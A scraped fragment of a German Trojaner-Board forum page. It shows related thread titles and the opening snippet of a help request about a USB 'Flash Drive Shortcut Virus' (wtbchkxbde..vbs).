  15. virus? C:\WINXP\system32\install\drive.exe
    Log-Analyse und Auswertung - 21.02.2011 (32)
  16. "Copy of Shortcut to (1).ink" (virus?) auf USBstick- Datenübertragung ohne virenübertragung möglich?
    Plagegeister aller Art und deren Bekämpfung - 03.01.2011 (9)

Zum Thema Flash Drive Shortcut Virus wtbchkxbde..vbs - Hallo Trojaner-Board Ich bin gerade auf Praxissemester im Regenwald von Papua Neuguinea und habe hier sehr schlechtes aber trotzdem ziemlich teures Internet. Ich bitte also um Verständnis dass ich nicht - Flash Drive Shortcut Virus wtbchkxbde..vbs...
Archiv
Du betrachtest: Flash Drive Shortcut Virus wtbchkxbde..vbs auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.